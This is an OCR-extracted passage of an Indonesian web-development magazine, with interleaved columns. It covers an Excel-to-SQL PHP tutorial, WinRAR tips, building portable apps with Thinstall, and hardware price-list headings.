resource saja. Tips dari penulis : jangan jadi seorang yang pemboros. <Author>Al-k</Author>
:D <LastAuthor>Al-k</LastAuthor>

.ilmuwebsite magazine | perdana 2009 51


.tips dan trik .ilmuwebsite e-learning community offline version
.magazine

</DocumentProperties> </Row>
<ExcelWorkbook xmlns="urn:schemas-microsoft- ...
com:office:excel">
<WindowHeight>9720</WindowHeight> Ya, kira-kira struktur filenya akan seperti itu, namun ada beberapa
<WindowWidth>15195</WindowWidth> bagian yang sengaja penulis dihilangkan. Langkah berikutnya adalah
<WindowTopX>480</WindowTopX> menjalankan script phpnya dengan menggunakan command line :
<WindowTopY>45</WindowTopY> Start menu | run | cmd
<ProtectStructure>False</ProtectStructure> ( ket: penulis menggunakan xampp pada tutorial ini, tidak berbeda
<ProtectWindows>False</ProtectWindows> dengan web server paketan yang lainnya )
</ExcelWorkbook>
Masuk ke dalam direktori dimana php.exe berada,
... C:\>cd c:\program files\xampp\php
<Worksheet ss:Name="DATA COSTUMER">
<Table ss:ExpandedColumnCount="5" Kemudian jalankan scriptnya,
ss:ExpandedRowCount="9" x:FullColumns="1" C:\Program Files\xampp\php>php.exe excel2sql.php <
x:FullRows="1"> c:\another\data1.xml
<Column ss:AutoFitWidth="0" ss:Width="18.75"/>
<Column ss:AutoFitWidth="0" ss:Width="105"/>
<Column ss:AutoFitWidth="0" ss:Width="111"/>
<Column ss:AutoFitWidth="0" ss:Width="147.75"/>
<Column ss:StyleID="s70" ss:AutoFitWidth="0"/>
<Row ss:Height="13.5">
<Cell ss:StyleID="s91"><Data
ss:Type="String">id</Data></Cell>
<Cell ss:StyleID="s92"><Data ss:Type="String">Nama
Customer</Data></Cell>
<Cell ss:StyleID="s92"><Data ss:Type="String">Alamat Gambar 3 : tampilan di command prompt
Rumah</Data></Cell>
<Cell ss:StyleID="s93"><Data Anda pun dapat menyisipkan hasil sqlnya kedalam satu file :
C:\Program Files\xampp\php>php.exe excel2sql.php <
ss:Type="String">Email</Data></Cell>
c:\another\data1.xml > databasecostumer.sql
<Cell ss:StyleID="s68"/>
</Row> Berikut adalah screenshoot hasil dari eksekusi perintah tersebut :
<Row>
<Cell ss:StyleID="s83"><Data
ss:Type="Number">1</Data></Cell>
<Cell ss:StyleID="s84"><Data ss:Type="String">Yudho
P</Data></Cell> [Al-k]
<Cell ss:StyleID="s84"><Data
ss:Type="String">Bandung</Data></Cell>
<Cell ss:StyleID="s85"><Data
ss:Type="String">antoniush@plasa.com</Data></Cell> Gambar 4 : hasil eksekusi perintah

52 .ilmuwebsite magazine | perdana 2009


e-learning community offline version .ilmuwebsite .tips dan trik
.magazine

Tips & trik : Aplikasi

WinRAR
v.4.56

Membuat password Menciptakan File EXE Mengganti Themes


Mengekstrak file menjadi RAR sangat tidak Selain membuat file RAR dan ZIP, WinRAR Bukan hanya sistem operasi atau handphone
aman bila data tersebut merupakan data juga mempunyai kemampuan untuk yang dapat mengganti themes. WinRAR pun
penting dan tidak diberikan password. Untuk menciptakan file EXE. File EXE merupakan file memiliki kemampuan untuk mengganti
memasang password pada WinRAR, caranya yang dapat dibuka secara langsung tanpa themes. Themes merupakan suatu fitur yang
sangat mudah. Klik kanan pada file yang ingin memerlukan software tambahan. Berbeda digunakan untuk mengganti tampilan suatu
di-RAR, lalu pilih “add to archive”. Setelah itu dengan file RAR yang hanya dapat dibuka program. Untuk mengganti Themes pada
pilih tab “advanced” lalu pilih “Set Password”. menggunakan WinRAR. Untuk menciptakan WinRAR, caranya cukup mudah. Buka
Masukkan password yang diinginkan, setelah file EXE, caranya klik kanan pada file yang program WinRAR yang telah anda install, lalu
itu beri tanda centang pada “encrypt file ingin dibuat EXE lalu pilih “add to archive”. pilih menu options > themes. Standarnya,
name”. ini gunanya agar nama file tidak Setelah itu berikan tanda centang pada Themes WinRAR adalah default theme. Untuk
terlihat. Setelah itu klik tombol “ok”. “Create SFX archive”. Masuk ke tab mendownload themes yang lain, silahkan di-
“advanced”, lalu pilih “SFX Options”. unduh di http://www.rarlab.com/themes.htm
Pada menu ini anda dapat mengganti tampilan
icon exe tersebut pada menu “text and icon”.
Sedangkan untuk memberikan lisensi pada file Hasil Kompresi yang maksimal
exe tersebut, pilih tab “license”. Title Untuk mendapatkan hasil kompresi yang baik,
merupakan judul lisensi sedangkan License jangan lupa untuk memilih options “best” pada
text merupakan isi lisensi. Jika sudah, klik bagian “compression method” yang terletak
“OK”. pada bagian kiri bawah tab “General”. Dengan
demikian hasil kompresi akan lebih irit dalam
Gambar 1 : tampilan winRAR v. 4.56 pemakaian memori.

.ilmuwebsite magazine | perdana 2009 53


.tips dan trik .ilmuwebsite e-learning community offline version
.magazine

Membuat
Aplikasi Portable
dengan Thinstall

A
da beberapa aplikasi popular yang biasa digunakan untuk Anda akan dipersilahkan menceklis drive mana saja yang akan
merakit aplikasi portable, merakit disini sebenarnya hanyalah discan kondisi registry-nya, untuk trik kali ini pilih drive c saja. Klik next
mengambil aplikasi yang ada untuk dijadikan ke dalam bentuk kembali.
portablenya, namun dalam trik kali ini penulis hanya menjelaskan satu
aplikasi popular yang dapat merakit sebuah aplikasi yang telah terinstall
dalam pc menjadi aplikasi portable, Thinstall, penulis menggunakan
versi 3.387.
Thinstall memiliki cara kerja seperti ini:i ketika thinstall dijalankan
maka seorang user diharuskan untuk memantau, mengecek, meng-
capture, keadaan registry sebelum software yang ingin dijadikan versi
portablenya diinstall, sehingga disarankan untuk merakit aplikasi
portable di perlukan pc yang clean, dimana didalamnya hanya terdapat
windows xp yang belum diinstall aplikasi lain. Hal ini dilakukan agar
kapasitas si software portable tidak menjadi bengkak akibat dari
pemampatan registry yang sebenarnya tidak diperlukan. Agar langsung dapat melakukan pengecekan registry klik sekali
Setelah di cek kondisi registrynya, maka user di persilahkan oleh next sekali lagi, gambar di bawah ini merupakan tampilan ketika Thinstall
Thinstall untuk menginstall aplikasi baru yang akan dijadikan sebagai melakukan pengecekan kondisi registry sebelum aplikasi di install.
aplikasi portable. Setelah selesai menginstall, maka thinstall Setelah selesai pengecekan, thinstall mempersilahkan me-
mempersilahkan user untuk kembali mengecek kondisi registry setelah
aplikasi selesai di install, nah keadaan registry setelah aplikasi baru
diinstall tersebutlah yang dijadikan oleh thinstall untuk dimanfaatkan
nantinya sebagai penyusun aplikasi portable. Cukup logis.
Mari sama-sama kita implementasikan. Namun sebelum dapat
melaksanakan itu semua, silahkan install aplikasi Thinstall terlebih
dahulu, file mentahnya penulis letakkan di /Software/Thinstall3.387.rar,
lakukan installasi seperti aplikasi biasanya. Setelah selesai maka
jalankan aplikasi thinstallnya :
Setelah terlihat tampilan awal seperti ini, langsung saja klik next :

minimize dirinya, untuk selanjutnya user dapat dengan leluasa dapat


menginstall aplikasi baru yang akan dijadikan software portable.
Langkah selanjutnya adalah silahkan untuk menginstall aplikasi
baru yang akan di jadikan software portable. Trik kali ini penulis
menggunakan aplikasi GimpShop, aplikasi alternatif dari Adobe
Photoshop, dan pastinya aplikasi ini bersifat free.
Setelah selesai menginstall gimpshop, jalankan gimpshop
kemudian lakukan konfigurasi standar, seperti mengedit plugin yang
dibutuhkan atau yang lainnya, setelah semua beres kembali ke aplikasi

54 .ilmuwebsite magazine | perdana 2009


e-learning community offline version .ilmuwebsite .tips dan trik
.magazine

thinstall, klik next, maka Thinstall akan kembali mengecek kondisi masalah maka anda dapat langsung mencoba aplikasi portable yang
registry setelah aplikasi baru di install dan di konfigurasi. baru dengan mengklik button browse project.
Setelah beres, maka akan terdapat satu tampilan dimana thinstall
memberitahukan terdapat satu aplikasi baru yang siap untuk dijadikan Untuk dapat menjalankan aplikasi portable dalam flashdisk cukup
ke dalam bentuk portable. Klik next. dengan mengcopy satu direktori aplikasi portable yang berada di dalam
direktori C:\Program Files\VMware\VMware North

Ketika tampilanya seperti ini maka pada Select Sandbox Location Star\Captures\GIMPshop 2.2.8\%ProgramFilesDir%, dalam trik kali ini
pilih saja User’s Profile (%AppData%/Thinstall). Kemudian klik penulis cukup mengcopykan direktori GIMPshop ke dalam flashdisk.
next kembali.
Kemudian akan terdapat pemberitahuan, dimanakah project yang Setelah semuanya selesai, maka uninstall aplikasi yang telah
telah dibuat akan disimpan, acuhkan saja, gunakan direktori defaultnya. diinstall tadi. Kemudian jalankan aplikasi portable yang telah dicopy ke
Untuk Compression-nya pilih Fast Compression, jika telah selesai dalam flashdisk.
maka klik next.

Langkah terakhir adalah klik button build now, jika tidak ada Selamat mencoba.

.ilmuwebsite magazine | perdana 2009 55


.info harga .ilmuwebsite e-learning community offline version
.magazine

Info Harga Hardware


60 dan accesories

Info HARGA
Hardware
.info harga

& Accesories
INTEL PROCESSOR AMD PROCESSOR

TV TUNER
UPS

DVD RW DUAL LAYER


SOUND CARD

60 .ilmuwebsite magazine | perdana 2009


e-learning community offline version .ilmuwebsite .info harga
.magazine

VGA PCI EXPRESS PRINTER - SCANNER

DDRAM 2 & DDRAM LTW

USB FLASHDISK

HARDDISK EXTERNAL 3,5 INCH


CRT MONITOR

.ilmuwebsite magazine | perdana 2009 61


.info harga .ilmuwebsite e-learning community offline version
.magazine

HARDDISK 3,5 INCH ACCESSORIS LCD MONITOR

CASSING

USB DEVICES

OPTICAL DRIVE

KEYBOARD & MOUSE

VGA AGP 8X
POWER SUPPLY

STABILISER

62 .ilmuwebsite magazine | perdana 2009


majalah
ilmuwebsite
untuk web developer, web designer, graphic designer
dari tingkat pemula hingga advanced ...

edisi yang akan datang ...

Plugins, Components,
Modules, dan
Extensions berbagai
CMS kesayangan anda
membahas ...

Membuat modules, components, Desain sendiri template untuk cms


a. dan plugins joomla dengan php c. joomla dan wordpress

Flash dan XML untuk kebutuhan


b. presentasi yang dinamis d. Mengirim email dan attachment
menggunakan php

Anda mungkin juga menyukai